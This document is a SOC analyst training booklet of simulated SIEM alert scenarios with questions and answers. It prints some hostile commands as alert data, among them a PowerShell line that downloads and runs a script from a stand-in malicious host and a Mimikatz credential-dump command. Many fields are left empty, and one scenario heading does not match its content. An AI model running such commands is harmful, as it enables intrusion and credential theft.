20 Simulations To Train SOC Analysts
20 Simulations To Train SOC Analysts
TRAIN SOC
ANALYSTS WITH
REALISTIC SIEM
ALERTS WITH
QUESTION AND
ANSWERS
BY IZZMIER IZZUDDIN
TABLE OF CONTENTS
SCENARIO 10: PHISHING ATTACK LEADING TO MFA BYPASS & PRIVILEGE ESCALATION
SCENARIO 17: WEB SERVER COMPROMISE – REVERSE SHELL & DATA EXFILTRATION
Background: A financial company with a hybrid cloud infrastructure has detected unusual
activity originating from a compromised workstation. The attack appears to involve an
attempt to move laterally across the network. Security analysts must investigate and
determine the root cause, affected systems and impact.
SIEM Alerts
Severity: High
Device: User Workstation (WIN-12345)
Alert: PowerShell script execution bypassing AMSI
Process Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec
bypass -w hidden -nop -c "IEX(New-Object
Net.WebClient).DownloadString('http://malicious[.]site/payload.ps1')"
Reason: The script attempts to execute a payload from an external source, bypassing
security controls.
Severity: Critical
Source IP: 192.168.1.10 (Compromised Workstation)
Destination IP: 185.244.25.37 (Threat Actor C2)
Port: 443
Signature: ET MALWARE - Possible Cobalt Strike Beacon Detected
Reason: Network traffic analysis detected a suspicious outbound connection associated
with a known Cobalt Strike C2 server.
Severity: Medium
Source: 192.168.1.10
Target: Multiple domain controllers
Failed Logins Count: 30 attempts within 5 minutes
Account Name: service-admin
Reason: Possible brute force or credential stuffing attack using a compromised machine.
Severity: High
User: service-admin
Source IP: 192.168.1.10
Destination: 192.168.1.20 (Finance Server)
Logon Type: 10 (Remote Interactive Login)
Reason: This account was used successfully from a machine that does not usually access
finance systems.
Severity: High
Source: 192.168.1.10
Destination: 192.168.1.50 (Another Workstation)
Protocol: SMB
Action: Allowed
Reason: Workstations rarely communicate directly over SMB, suggesting lateral
movement.
Raw Logs
QUESTIONS
ANSWERS
1. Initial Entry Point: The attacker exploited PowerShell (Log 1), downloading a malicious
script from an external URL. Likely a phishing attack.
2. Security Bypass: The attacker used -exec bypass -w hidden -nop, evading AMSI and
Windows Defender.
3. C2 Evidence: The outbound connection to 185.244.25.37 is a known Cobalt Strike IP
(Log 2).
4. Suspicious AD Login: Multiple failed logins (Log 3) followed by a successful login (Log
4) suggest credential stuffing.
5. Logon Type 10: Indicates a remote interactive login, which is unusual for service-
admin.
6. Next Steps of Attacker: Lateral movement via SMB traffic (Log 5), possibly attempting
ransomware or further exploitation.
7. SMB Traffic: Workstations rarely communicate over SMB directly, indicating lateral
spread.
8. Immediate Actions:
o Contain and isolate 192.168.1.10.
o Reset service-admin credentials.
o Check for further lateral movement.
9. MITRE ATT&CK Techniques:
o T1059 (Command and Scripting Interpreter)
o T1071 (Application Layer Protocol)
o T1110 (Brute Force)
o T1021 (Remote Services)
o T1570 (Lateral Movement)
10. Prevention:
• Restrict PowerShell execution policies.
• Monitor abnormal outbound connections.
• Implement MFA for privileged accounts.
• Disable unnecessary SMB communication between workstations.
SCENARIO 2: DATA EXFILTRATION VIA CLOUD STORAGE ABUSE
SIEM Alerts
These alerts come from various security solutions, indicating a potential data exfiltration
attempt:
1. CASB (Cloud Access Security Broker) Alert - Large Upload to Google Drive
Severity: High
User: izzmier@company.com
Source IP: 172.16.45.23 (Corporate Laptop)
Destination: drive.google.com
File Upload Size: 5.2 GB
Alert: Unusual large file upload detected
Reason: This user has never uploaded such a large amount of data to Google Drive before.
Severity: High
Source IP: 172.16.45.23
Destination: drive.google.com, dropbox.com, mega.nz
Total Data Transferred: 10.7 GB
Action: Allowed
Reason: The user accessed multiple cloud storage services within a short timeframe,
attempting to move data out of the network.
3. Endpoint DLP (Data Loss Prevention) Alert - Sensitive Files Moved to External Drive
Severity: Critical
User: izzmier@company.com
Device: CFO-LAPTOP-21
File Types: .xls, .csv, .pdf
File Count: 432
Action: Copied to D:\ExternalDrive
Reason: The files contain financial records, detected by DLP as sensitive information.
Severity: Critical
User: izzmier@company.com
Triggered Events:
Raw Logs
QUESTIONS
ANSWERS
SIEM Alerts
These alerts correlate across different security solutions to indicate potential lateral
movement and privilege escalation:
Severity: Critical
User: izzmier@company.com
Source IP: 192.168.10.45 (Employee Laptop)
Endpoint: WIN10-IZZ45.company.local
Process: C:\Users\Izzmier\Downloads\mimikatz.exe
Command: sekurlsa::logonpasswords
Action: Blocked
Reason: Mimikatz is a known credential dumping tool used by attackers to extract hashes
from memory.
Severity: High
Source IP: 192.168.10.45
Destination: DC1.company.local (192.168.1.10)
User: izzmier@company.com
Event ID: 4624 (Type 3 - Network Logon)
Authentication Package: NTLM
Action: Allowed
Reason: NTLM authentication was attempted from a non-admin workstation, which is not
normal behaviour.
Severity: High
Source IP: 192.168.10.45
Destination: 192.168.10.78 (Finance Server)
Protocol: SMB
Port: 445
Action: Allowed
Reason: The user izzmier@company.com attempted to connect to a finance server via
SMB, which is not part of their normal behaviour.
Severity: Critical
User: izzmier@company.com
Triggered Events:
Severity: Critical
User: izzmier@company.com
Event ID: 4732 (Member added to privileged group)
Target Group: Domain Admins
Source: DC1.company.local
Reason: This user does not have permission to add themselves to the Domain Admins
group. This action suggests unauthorised privilege escalation.
Raw Logs
QUESTIONS
ANSWERS
Background: A SOC team at a financial institution detects unusual cloud API activity from
a legitimate user’s account. The investigation reveals OAuth token abuse, where a
compromised token was used to maintain persistent access to cloud services despite
password resets. This attack bypasses traditional security controls like MFA, allowing
attackers to move stealthily within cloud environments, exfiltrate sensitive data and
maintain access long-term.
SIEM Alerts
Severity: High
User: izzmier@company.com
Source IP: 185.216.33.14 (Unusual - Russia)
Application: Microsoft 365 - Outlook API
Grant Type: Refresh Token
Action: Allowed
Reason: OAuth tokens are being generated from an unusual IP that does not match
Izzmier's typical access pattern.
Severity: Critical
User: izzmier@company.com
Source IP: 185.216.33.14
Action: Downloaded 2GB of files
Files: Financial_Report_Q1_2025.xlsx, Client_Data.csv, Company_Strategy.pptx
Action: Allowed
Reason: High-volume downloads from an unusual location suggest data exfiltration.
Severity: Critical
User: izzmier@company.com
Triggered Events:
Severity: High
User: izzmier@company.com
Recent Logins:
5. Endpoint Detection & Response (EDR) Alert - Suspicious Email Forwarding Rule
Severity: High
User: izzmier@company.com
Rule Created: Forward all emails to attacker@evilmail.com
Reason: Attackers often set up forwarding rules to steal sensitive data without needing
persistent access.
Raw Logs
QUESTIONS
ANSWERS
SIEM Alerts
Severity: High
User: svc-ci-deploy@company.com (Service Account)
Source IP: 102.219.44.88 (Unusual - Germany)
Access Type: Assumed AWS IAM Role via Identity Federation
Target: AWS EC2, S3, IAM
Action: Allowed
Reason: The service account is normally only used for CI/CD deployments from Malaysia
but was observed assuming an AWS IAM role from Germany.
Severity: Critical
User: svc-ci-deploy@company.com
Triggered Events:
Severity: Critical
User: svc-ci-deploy@company.com
Source IP: 102.219.44.88
Bucket Name: s3://client-sensitive-data
Action: Downloaded 50GB of sensitive files
Action: Allowed
Reason: The service account typically does not access S3 buckets directly.
Severity: High
User: svc-ci-deploy@company.com
Region: us-east-1
Action: Created EC2 instance
Instance Type: t2.medium
AMI ID: ami-0abcdef1234567890
Action: Allowed
Reason: Attackers often deploy rogue instances for post-exploitation activities such as C2
(Command & Control).
Severity: Critical
User: svc-ci-deploy@company.com
Action: Generated new IAM access key
Reason: This indicates potential persistence mechanisms, allowing the attacker to
maintain access even if their session is revoked.
Raw Logs
ANSWERS
SIEM Alerts
Severity: Medium
Hostname: HR-PC-05
User: izzmier.hr@company.com
Process: winword.exe → cmd.exe /c powershell -exec bypass -File
C:\Users\Izzmier\Documents\payload.ps1
Reason: Word executed a PowerShell script in bypass mode. This is a common attack
technique for initial infection via malicious macros.
Severity: High
Source IP: 192.168.1.45 (HR-PC-05)
Destination: malicious.dns-server.com
Protocol: DNS
Query Type: TXT
Query Volume: 5000+ DNS requests in 10 minutes
Reason: High volume of TXT record DNS queries to an unknown external domain suggests
data exfiltration via DNS tunneling.
Severity: Critical
Triggered Events:
Severity: High
Source IP: 192.168.1.45
Destination: malicious.dns-server.com
Detection Method: Behavioural Anomaly Detection
Reason: The system is sending large DNS queries encoded with Base64 to a domain not
associated with legitimate business activity.
Severity: Critical
User: izzmier.hr@company.com
Process: powershell.exe -enc JAB3AG… (truncated base64 payload)
Network Activity: Connected to malicious.dns-server.com
Reason: The PowerShell script is attempting remote communication via DNS queries,
likely for C2 interaction or exfiltration.
Raw Logs
QUESTIONS
ANSWERS
Background: An insider threat has been detected within the Finance Department of a
company. A disgruntled employee, who is about to resign, is using Remote Desktop
Protocol (RDP) to transfer sensitive financial records to an external server. The attacker is
bypassing traditional security monitoring by using legitimate credentials and an encrypted
RDP session. The security team noticed an increase in off-hours RDP activity from an
employee’s workstation to an unapproved external IP. Investigation reveals that large
financial files were accessed and transferred just before the employee submitted their
resignation.
SIEM Alerts
Severity: Medium
Username: izzmier@company.com
Source: FINANCE-WS-07
Destination: 192.168.2.200 (Internal Server)
Login Time: 2025-03-05 22:14:33
Reason: Employee logged in outside of normal working hours (22:14), which is unusual for
this role.
Severity: High
Source IP: 192.168.2.200
Destination IP: 45.77.89.32 (Unapproved External Server)
Protocol: TCP 3389 (RDP)
Connection Time: 2025-03-05 22:30:12
Reason: RDP connection was initiated to an unapproved external IP, potentially for data
exfiltration.
Severity: Critical
Triggered Events:
Severity: High
User: izzmier@company.com
Files Accessed:
• Q1-Financial-Report.xlsx
• Client-Invoices-2025.pdf
• Revenue-Projections.docx
Reason: User accessed and copied a large number of financial documents just
before establishing an RDP session.
Severity: Critical
Source: 192.168.2.200
Destination: 45.77.89.32
Data Transferred: 850MB in 5 minutes
Reason: Large outbound data transfer via RDP is uncommon and suggests potential data
theft.
Raw Logs
ANSWERS
SIEM Alerts
Severity: High
Source IPs:
• 103.224.34.76 (Vietnam)
• 185.199.110.25 (Russia)
• 204.145.78.11 (USA)
Target URL: https://customerportal.company.com/login
Failed Attempts: 12,378 in 1 hour
Reason: High volume of failed logins suggests an automated credential stuffing
attack.
2. IAM Alert - Multiple Logins from Different Locations for Same Account
Severity: Critical
User Account: izzmier@company.com
Login Attempts:
3. SIEM Correlation Rule - Excessive Failed Logins & Anomalous Login Success
Severity: Critical
Triggered Events:
Severity: High
Source: Dark Web Monitoring Service
Leaked Credentials: izzmier@company.com, izzmier@company.com,
izzmier@company.com
Breach Source: Recent XYZ Service Data Breach (Feb 2025)
Reason: Compromised credentials found in a recent breach.
Severity: Medium
User: izzmier@company.com
Activity:
• ListUserPermissions
• GetAccountDetails
• ModifySecurityGroups
Reason: New API calls from a user who doesn’t normally access these services.
Raw Logs
QUESTIONS
1. What are the key indicators of a credential stuffing attack in this scenario?
2. Why is "impossible travel" a strong indicator of account compromise?
3. How does a credential stuffing attack differ from a brute-force attack?
4. What does the success of some logins indicate?
5. Why is the API activity from izzmier@company.com suspicious?
6. What immediate steps should the SOC team take?
7. What long-term measures can prevent credential stuffing attacks?
8. How can dark web monitoring help in defending against credential stuffing?
9. How should the company inform affected users?
10. What legal and compliance steps should be taken in response to this incident?
ANSWERS
SIEM Alerts
1. DLP (Data Loss Prevention) Alert - Large Data Download from SharePoint
Severity: Critical
User: izzmier@company.com
Source: Internal SharePoint Server
Files Downloaded:
• financial_report_Q1.xlsx
• customer_PII_records.csv
• salary_structure_2025.pdf
Total Data Size: 8.7GB
Reason: User accessed and downloaded large amounts of sensitive data,
exceeding normal usage patterns.
Severity: High
User: izzmier@company.com
Source: Company Laptop (Internal Network)
Destination: Personal Google Drive (izzmier@gmail.com)
Files Uploaded: Same files from SharePoint
Total Data Transferred: 8.7GB
Reason: User uploaded sensitive company documents to an unauthorised personal cloud
storage account.
Severity: Critical
Triggered Events:
Severity: Medium
User: izzmier@company.com
Login Attempts:
Severity: High
Source: Dark Web Monitoring Service
Leaked Credentials: izzmier@company.com
Breach Source: Compromised in a past LinkedIn data breach (February 2025)
Reason: The user’s credentials have been leaked and may have been used in an attack.
6. EDR (Endpoint Detection & Response) Alert - Unusual PowerShell Script Execution
Severity: High
User: izzmier@company.com
Script Executed:
Reason: The user ran a PowerShell script to download and execute an unknown
executable from an external source.
Raw Logs
QUESTIONS
ANSWERS
SIEM Alerts
Severity: High
User: izzmier@company.com
Email Subject: URGENT: Payroll Error - Action Required
Sender: finance-dept@companymail.support (Spoofed Domain)
Malicious Link Clicked: http://fake-company-login.com
Reason: User clicked a phishing link and entered credentials.
Severity: Critical
User: izzmier@company.com
Login Event:
Severity: Critical
User: izzmier@company.com
Event: Added "izzmier" to "Domain Admins" group
Time: 10:12:45 AM
Reason: User granted admin rights to themselves – suspicious privilege escalation.
Severity: Critical
Admin Account Created: sysadmin_backup
Created By: izzmier@company.com
Privileges: Full Domain Admin
Reason: Possible persistence mechanism for backdoor access.
5. Firewall Alert - Unusual RDP Connection from External IP
Severity: High
Source IP: 202.89.44.56 (Jakarta, Indonesia)
Destination: Internal HR Server
Protocol: RDP (Port 3389)
Reason: External RDP session detected from an untrusted country.
Severity: Critical
Triggered Events:
Raw Logs
QUESTIONS
ANSWERS
SIEM Alerts
Severity: High
User: izzmier@company.com
Destination: https://fileshare-mega.io
File Size: 2.3GB
File Type: Company Financial Reports (.xlsx, .pdf)
Reason: Sensitive data exfiltration detected.
Severity: Medium
User: izzmier@company.com
Source IP: 192.168.1.45 (Corporate Laptop)
Destination: https://fileshare-mega.io
Data Transferred: 2.3GB within 5 minutes
Reason: Unusual outbound data transfer exceeding company policies.
Severity: Medium
User: izzmier@company.com
Event: Blocked attempt to copy files to USB Drive
Reason: User tried copying sensitive files to USB but was blocked by security policies.
Severity: Critical
User: izzmier@company.com
Event: Logged into personal cloud storage account using work device
Time: 2025-03-06 14:22:10
Reason: Potential policy violation and data exfiltration attempt.
Raw Logs
QUESTIONS
SIEM Alerts
Severity: Medium
Source IPs: Multiple (including 198.51.100.23, 203.0.113.45, 192.0.2.67)
Destination: https://login.company.com
Failed Login Attempts: 5,673 attempts within 10 minutes
Reason: Unusual volume of failed login attempts detected. Possible credential stuffing
attack.
Severity: High
Source IP: 198.51.100.23
Reputation: Known for brute-force attacks and credential stuffing (Threat Intelligence
Feed).
Reason: IP flagged for past involvement in cyberattacks.
Severity: High
User: izzmier@company.com
Successful Login Location 1: Malaysia (IP: 203.0.113.12, Timestamp: 2025-03-06
10:45:30)
Successful Login Location 2: Russia (IP: 45.76.98.210, Timestamp: 2025-03-06 10:46:00)
Reason: Possible account compromise due to simultaneous logins from different
geolocations within seconds.
Severity: Critical
User: izzmier@company.com
Event: Browser session hijacked after login from unrecognised IP.
Reason: Possible credential compromise leading to session takeover.
5. SIEM Correlation Rule - Possible Credential Compromise
Severity: Critical
Triggered Events:
Raw Logs
QUESTIONS
ANSWERS
Background: A trusted employee working in the finance department has been flagged for
suspicious activity. The SOC team detected large-scale file transfers from a corporate file
server to an external cloud storage service.
SIEM Alerts
1. Data Loss Prevention (DLP) Alert – Large File Transfer to External Cloud
Severity: High
User: Izzmier@company.com
File Type: .xlsx, .csv, .pdf
Total Data Transferred: 3.8GB
Destination: Google Drive (drive.google.com)
Reason: Unusual large-scale file transfer detected.
Severity: High
User: Izzmier@company.com
Login Time: 2025-03-06 02:15:40 (Outside Business Hours)
Accessed Files:
• Q1-Financial-Report.xlsx
• Employee-Salary-2025.csv
• Company-Investment-Plan.pdf
Reason: Suspicious file access outside normal working hours.
Severity: Critical
Source: 10.0.1.25 (Izzmier's Workstation)
Destination: 45.33.21.89 (Unregistered Cloud Storage Server)
Protocol: TCP Port 4443 (Non-Standard HTTPS)
Data Sent: 1.2GB in 5 minutes
Reason: Possible data exfiltration to an unknown external server.
Severity: Medium
User: Izzmier@company.com
Device: SanDisk Ultra USB 128GB
Files Copied: 230 files (total 2.6GB)
Reason: High volume of sensitive files copied to a removable USB device.
Severity: Critical
Triggered Events:
Raw Logs
QUESTIONS
ANSWERS
Background: A company's VPN service is showing suspicious login attempts from multiple
geolocations within a short period. The SOC team suspects that an attacker has stolen
employee credentials and is using them to pivot inside the network.
SIEM Alerts
Severity: High
User: izzmier@company.com
Login Attempts: Malaysia (MY) → Russia (RU) → Germany (DE) in 10 minutes
VPN Source IPs:
Severity: Critical
User: izzmier@company.com
Target: WIN-SERVER-DC01 (Domain Controller)
Action: Added to Domain Admins Group
Reason: Potential privilege escalation – attacker gaining higher access.
Severity: High
Host: HR-FILES-SERVER
User: izzmier@company.com
Command:
powershell -enc
"UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAcgBpAGQAIAAoACQAcwBjAHIAa
QBwAHQAI"
Decoded Command:
Severity: Critical
Source: 10.0.2.15 (Compromised VPN user system)
Destination: 10.0.3.5 (HR Files Server)
Event: Pass-the-Hash Attack Detected
Reason: Possible attacker moving laterally using stolen credentials.
Severity: Critical
Triggered Events:
Raw Logs
2025-03-06 09:30:10, EventID: 4728, Action: User added to Domain Admins, User:
izzmier@company.com, Target: WIN-SERVER-DC01, Status: Success
QUESTIONS
ANSWERS
• Implement conditional access policies (e.g., only allow logins from trusted
locations).
• Use behavioural analytics (UEBA) to detect unusual user activity.
• Enforce privileged access management (PAM) to control admin-level permissions.
SCENARIO 15: INSIDER THREAT – EMPLOYEE EXFILTRATING SENSITIVE
DATA
SIEM Alerts
Severity: High
User: izzmier@financecorp.com
Source IP: 10.1.2.34 (Employee Workstation)
Destination IP: 185.220.101.55 (Suspicious External Server – Known for Data Leaks)
Data Transferred: 4.8GB
Reason: Unusual data transfer outside business hours
Severity: Critical
User: izzmier@financecorp.com
Device: USB Kingston 128GB
Files Copied:
• customer_data_2025.xlsx (2.3GB)
• financial_reports_Q1.pdf (1.2GB)
Reason: Sensitive files transferred to removable storage.
Severity: High
User: izzmier@financecorp.com
Destination URL: drive.google.com/upload
File Size: 1.5GB
Reason: Possible data exfiltration to a personal cloud account.
Severity: Critical
Triggered Events:
Raw Logs
2025-03-06 22:15:42, SrcIP: 10.1.2.34, DstIP: 185.220.101.55, Protocol: TCP, Bytes Sent:
4.8GB, Action: Allowed
QUESTIONS
ANSWERS
SIEM Alerts
Severity: High
User: izzmier@company.com
Source IP: 45.67.89.23 (Russia)
Destination: vpn.company.com
Action: Login Successful
Reason: User never logged in from this country before.
Severity: Medium
User: izzmier@company.com
Source IP: 10.10.5.23 (VPN Assigned IP)
Destination: 10.10.3.45 (File Server)
Failed Logins: 15 attempts within 5 minutes
Reason: Possible brute-force attempt on RDP.
Severity: High
Host: 10.10.3.45 (File Server)
User: izzmier@company.com
Command:
Severity: Critical
User: izzmier@company.com
Action: Added to Domain Admins Group
Source System: 10.10.3.45 (File Server)
Reason: User should not have admin access.
Severity: Critical
Triggered Events:
Raw Logs
QUESTIONS
ANSWERS
• Attackers who escalate privileges can take full control of the network.
• Real-time alerts for admin changes help detect security breaches early.
SCENARIO 17: WEB SERVER COMPROMISE – REVERSE SHELL & DATA
EXFILTRATION
SIEM Alerts
Severity: High
Source IP: 203.113.45.67 (Unknown)
Destination: 10.10.2.15 (Web Server)
Action: Suspicious SQL Query Execution
Query:
Severity: Critical
Web Server IP: 10.10.2.15
External IP: 103.45.78.90
Process: /usr/bin/bash
Command:
Severity: Critical
User: www-data (Web Server User) → root (Privilege Escalation)
Command Executed:
sudo su root
Severity: High
Source: 10.10.2.15 (Web Server)
Destination: 103.45.78.90 (External Server)
File Transfer Size: 500MB
Protocol: HTTP/HTTPS
Reason: Unusual outbound data transfer detected.
Severity: Critical
Triggered Events:
Raw Logs
QUESTIONS
Answers
SIEM Alerts
Severity: Medium
Source User: izzmier@company.com
Workstation: FINANCE-PC01
File Downloaded: 2024_Q1_Financials.xlsx
File Size: 120MB
Location: \\192.168.1.10\Finance\SensitiveReports\
Reason: Unusual volume of file downloads detected from Finance department.
Severity: High
Source User: izzmier@company.com
Email Recipient: personal.email@gmail.com
Attachment: 2024_Q1_Financials.xlsx (120MB)
Subject: No Subject
Reason: Unusual attachment size sent via external email.
Severity: High
Source User: izzmier@company.com
Application: Google Drive
File Uploaded: 2024_Q1_Financials.xlsx
Data Size: 120MB
Reason: Company policy blocks uploads to cloud storage services, but this action was
attempted.
Severity: Critical
Workstation: FINANCE-PC01
USB Device: Kingston DataTraveler 32GB
File Copied: 2024_Q1_Financials.xlsx
Reason: Unauthorised USB device detected, copying restricted files.
Severity: Critical
Triggered Events:
Raw Logs
QUESTIONS
ANSWERS
Background: A threat actor has compromised the email account of a company’s CFO
(cfomanager@company.com). The attacker uses the CFO’s email to send a fraudulent
payment request to the finance team, instructing them to transfer money to an offshore
bank account. The attacker also sets up email forwarding rules to intercept incoming
emails and delete replies from employees questioning the transaction.
SIEM Alerts
Severity: High
Source User: cfomanager@company.com
Source IP: 185.216.35.112 (Russia)
Login Time: 2025-03-07 08:30:12 UTC
Reason: Login from an unusual foreign IP, never seen before.
Severity: High
Source User: cfomanager@company.com
Rule Created: Forward all incoming emails to attacker.email@protonmail.com
Reason: New email forwarding rule detected. Could indicate compromise.
Severity: Critical
Source User: cfomanager@company.com
Recipient: finance@company.com
Subject: URGENT: Wire Transfer Payment Required Today
Message:
Hello,
Please process an urgent wire transfer of RM 250,000 to the following account:
Regards,
CFO Manager
4. Endpoint Security Alert – Unusual Access to CFO’s Email from New Device
Severity: High
Source User: cfomanager@company.com
Device: Windows 10 (Unknown Device)
IP Address: 185.216.35.112
Location: Russia
Reason: CFO's email accessed from a device that has never logged in before.
Severity: Critical
Triggered Events:
Raw Logs
Log 4: Device Access Log (New Device Used for Email Login)
1. What are the common indicators of a Business Email Compromise (BEC) attack?
2. Why is logging in from an unknown country a red flag?
3. How can attackers abuse email forwarding rules?
4. What security controls can detect and prevent unauthorised logins?
5. What steps should a SOC analyst take after detecting a compromised email
account?
6. Why is a finance-related email request a high-risk event?
7. What tools can detect fraudulent financial transactions?
8. How can security teams prevent email spoofing and phishing attacks?
9. What policies should be in place to verify high-value financial transactions?
10. What should the security team do if the attacker successfully stole money?
ANSWERS
1. What are the common indicators of a Business Email Compromise (BEC) attack?
o Login from an unusual IP or country.
o New email forwarding rules created.
o Unusual financial transaction requests.
o Emails being deleted before recipients see them.
2. Why is logging in from an unknown country a red flag?
o The CFO usually logs in from Malaysia.
o An IP from Russia suggests potential compromise.
3. How can attackers abuse email forwarding rules?
o Forward all incoming emails to attacker’s inbox.
o Intercept and delete replies from employees questioning the fraud.
4. What security controls can detect and prevent unauthorised logins?
o Multi-Factor Authentication (MFA).
o Geolocation-based login restrictions.
5. What steps should a SOC analyst take after detecting a compromised email
account?
o Reset the user’s password immediately.
o Revoke all active sessions.
o Disable email forwarding rules.
o Investigate further for other affected accounts.
6. Why is a finance-related email request a high-risk event?
o Attackers target finance teams for large wire transfers.
o Fake emails impersonating executives are common.
7. What tools can detect fraudulent financial transactions?
o Fraud detection systems in banking platforms.
o Machine learning models identifying unusual transfers.
8. How can security teams prevent email spoofing and phishing attacks?
o Implement DMARC, DKIM, SPF email security policies.
o Train employees on phishing awareness.
9. What policies should be in place to verify high-value financial transactions?
o Mandatory verbal confirmation for wire transfers.
o Dual-authorisation requirements for large payments.
10. What should the security team do if the attacker successfully stole money?
SIEM Alerts
Severity: High
Source User: izzmier@company.com
Device: Company-Laptop-124
Destination: api.dropbox.com
Transferred Data: 15GB
Reason: Unusual high-volume data upload detected.
Severity: High
Source User: izzmier@company.com
File Accessed: /finance/Q1-2025-strategy.xlsx
File Accessed: /clients/top100-vip-customers.xlsx
File Accessed: /engineering/confidential-designs.pdf
Reason: Accessing files outside Izzmier’s usual role.
Severity: High
Source User: izzmier@company.com
Application: Dropbox
Policy Violation: Uploading corporate files to a personal account.
Severity: High
Source IP: 192.168.1.45 (Izzmier’s Laptop)
Destination: dropbox.com
Bandwidth Usage: 150 Mbps
Reason: Unusual outbound traffic volume. Possible data exfiltration.
5. SIEM Correlation Alert – Multiple Indicators of Data Theft
Severity: Critical
Triggered Events:
Raw Logs
QUESTIONS
ANSWERS